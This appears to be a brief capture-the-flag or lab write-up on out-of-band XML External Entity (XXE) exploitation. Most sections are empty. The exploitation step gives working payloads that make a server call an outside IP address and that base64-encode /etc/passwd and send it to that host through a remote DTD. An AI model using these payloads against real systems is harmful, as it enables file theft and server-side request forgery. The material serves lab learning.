OOB XXE
March 20, 2024
Task 1: XML Introduction



Task 2: XML External Entity (XXE) Introduction




Task 3: Deploying the machine

Task 4: Assessing the Target Web Application




Task 5: Exploiting OOB XXE
First we have to send the POST request of the website to Repeater section of BURP

Then we will modified the legitimate request to test a ssrf vulnerability in the website.
Change the <name> paramater from kyou to &ssrf; which we need to call the variable to execute the command.
<!DOCTYPE response [
<!ENTITY ssrf SYSTEM "http://10.9.193.229:8000">
]>
&ssrf;

We can see that the server actually reached our python server

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'http://10.9.193.229:8000/?data=%file;'>">
%xxe;

<!DOCTYPE response SYSTEM "http://10.9.193.229:8000/oob-xxe.dtd">
&exfil;



Task 6: Impact, Mitigation, Tools, and References



Last updated